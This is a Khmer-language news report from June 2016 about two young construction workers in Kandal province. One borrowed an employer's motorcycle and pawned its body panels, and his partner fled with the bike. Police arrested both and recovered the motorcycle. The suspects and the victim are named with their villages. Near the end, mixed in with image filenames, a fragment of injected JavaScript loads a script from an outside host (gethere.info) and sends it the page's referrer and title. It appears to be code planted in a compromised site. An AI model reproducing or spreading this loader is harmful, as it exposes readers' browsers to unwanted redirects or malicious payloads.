Update: បង្ក្រាបឬសគល់លើករណី ខ្ចីគេហ៊ាន​ត្រឹមបញ្ចាំក្បាំង ឯដៃគូចិត្តខ្លាំងយកម៉ូតូទៅបាត់

 

ស្រុកខ្សាច់កណ្តាល៖ ម្នាក់ទៀតដែលយកម៉ូតូពីដៃគូទៅបាត់នោះ ពេលនេះសមត្ថកិច្ចឃាត់ខ្លួនបានហើយ ដោយដកហូតម៉ូតូជនរងគ្រោះត្រឡប់មកវិញ ក្រោយពីជនសង្ស័យរូបនោះយកម៉ូតូគេបន្តពីដៃគូ ហើយគេចខ្លួន តែត្រូវសមត្ថកិច្ចអូសក វាយខ្នោះ បានកាលពីវេលាម៉ោង៧ព្រឹកថ្ងៃទី២០មិថុនាឆ្នាំ២០១៦នេះ បន្ទាប់ពីចាប់បានដៃគូម្សិលមិុញអូសចូលមន្ទីរឃុំឃាំង។

ជនសង្ស័យដែលសមត្ថកិច្ចទើបតែឃាត់ខ្លួនបាននេះឈ្មោះ សួន កក្កដា ហៅអឿន  ឬកាក់ បានឃាត់ខ្លួននៅចំនុច ភូមិកោះតូចឃុំកោះឧកញ៉ាតី ស្រុកខ្សាច់កណ្តាល ខេត្តកណ្តាល ដោយដកហូតម៉ូតូដែលជាវត្ថុតាង គឺ ម៉ូតូម៉ាកសង់សេ១២៥ សេរី២០១៥ របស់ជនរងគ្រើត្រលប់មកវិញផងដែរ។

 

គួររំលឹកថាម្សិលមិុញសមត្ថកិច្ចឃាត់ខ្លួន បុរសម្នាក់បន្ទាប់ពីខ្ចីម៉ូតូគេទៅយកទូរស័ព្ទ បែជាបង្វិលក្បាលទៅភ្នំពេញ ចូលកន្លែងទទួលបញ្ចាំដ៏ល្បីមួយដែលគេហៅថាឃ្លាំងរំសេវ  ហើយដាក់ក្បាំងម៉ូតូបញ្ចាំបាត់។ តែយុវជននោះសប្បាយបានតែមួយថ្ងៃ ត្រូវដៃគូ យកម៉ូតូនោះគេចទៅបាត់ ដល់ត្រលប់មកវិញម្ចាស់ចាប់ជាប់នាំចូលប៉ុស្តិ៍នគរបាល អោយនគរបាលចាត់ការទៅតាមផ្លូវច្បាប់។

សមត្ថកិច្ចបានអោយដឹងថាជនល្មើសចំនួន២នាក់
១/ឈ្មោះអៀង សេរី ភេទប្រុស អាយុ ១៨ឆ្នាំមុខរបរ កម្មករស្ទួចផ្ទះមានទីលំនៅ ភូមិកោះតូច ឃុំកោះឧកញ៉ាតី ស្រុកខ្សាច់កណ្តាល ខេត្តកណ្តាល (ឃាត់ខ្លួន) ។
២/ ឈ្មោះសួន កក្កដា ភេទប្រុសអាយុ១៩ឆ្នាំជនជាតិខ្មែរ មុខរបរកម្មករស្ទួចផ្ទះ មានទីលំនៅភូមិកោះតូច ឃុំកោះឧកញ៉ាតី ស្រុកខ្សាច់កណ្តាល ខេត្តកណ្តាល (គេចខ្លួន) ចំណែកជនរងគ្រោះឈ្មោះ សាំង ដា ភេទប្រុស អាយុ ៣៣ឆ្នាំ ជនជាតិខ្មែរ មុខរបរជាងស្ទួចផ្ទះ នៅភូមិកោះតូច ឃំុកោះឧកញ៉ាតី ស្រុកខ្សាច់កណ្តាល ខេត្តកណ្តាល បានបាត់បង់ម៉ូតូ១គ្រឿងម៉ាកហុងដាC125 ស៊េរីឆ្នាំ2015 ពណ៌ខ្មៅ ពាក់ស្លាកលេខ ភ្នំពេញ1CX9833 ។

ប្រភពដដែលបានបន្តថានៅថ្ងៃទី០៧ខែមិថុនា ឆ្នាំ២០១៦ជនរងគ្រោះបានដឹកសំភារ:ស្ទួចផ្ទះ ទៅស្ទួចផ្ទះនៅ ភូមិបឹងគ្រុំក្រោម ឃុំ បឹងគ្រុំ ស្រុកល្វាឯម ខេត្តកណ្តាលដោយដឹកកម្មករចំនួន៥នាក់ទៅជាមួយរួមទាំងជនល្មើស២នាក់ផងដែរ ។

លុះដល់ថ្ងៃទី១៦ខែឆ្នាំដដែល ម៉ោង៣និង៣០នាទីរសៀល ជនរងគ្រោះបានមកផ្ទះនៅឃុំកោះឧកញ៉ាតី ដោយផ្ញើម៉ូតូទុកឲ្យឈ្មោះសាំង សុភា ជាកម្មករមើលការខុសត្រូវឲ្យ តែដល់ស្អែកឡើងថ្ងៃទី១៧ ជនល្មើសឈ្មោះ អៀង សេរី បានខ្ចីម៉ូតូ ពីឈ្មោះសាំង សុភា ថា ទៅយកទូរសព្ទ័ ពេលបានម៉ូតូជនល្មើសបានឌុបជនល្មើសម្នាក់ទៀត ឈ្មោះ សួន កក្កដា ទៅភ្នំពេញ យកក្បាំងម៉ូតូទៅបញ្ជាំនៅម្តុំឃ្លាំងរំសេវ រាជធានីភ្នំពេញ បានលុយ៣០ដុល្លារ ហើយនាំគ្នាមកដេកផ្ទះសំណាក់នៅផ្សារសូរិយា រាជធានីភ្នំពេញ ។

 

ស្រាប់តែនៅថ្ងៃទី១៨ ម៉ោង៣រសៀល ជនល្មើសឈ្មោះ
សួន កក្កដាបាន ជិះម៉ូតូគេចពីផ្ទះសំណាក់បាត់ ចំណែកឯជនល្មើសឈ្មោះ អៀង សេរី ក៏ត្រឡប់មកផ្ទះវិញ ហើយវេលាម់ោង៧និង៣០នាទីព្រឹកថ្ងៃទី១៩ ជនរងគ្រោះបានឃាត់ជនល្មើសឈ្មោះអៀង សេរី ប្រគល់ឲ្យប៉ុស្តិ៍កោះឧកញ៉ាតីបន្តអនុវត្តតាមនីតិវិធីតែម្តង ។

FB_IMG_1466417021520 FB_IMG_1466417011814FB_IMG_1466326542909s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More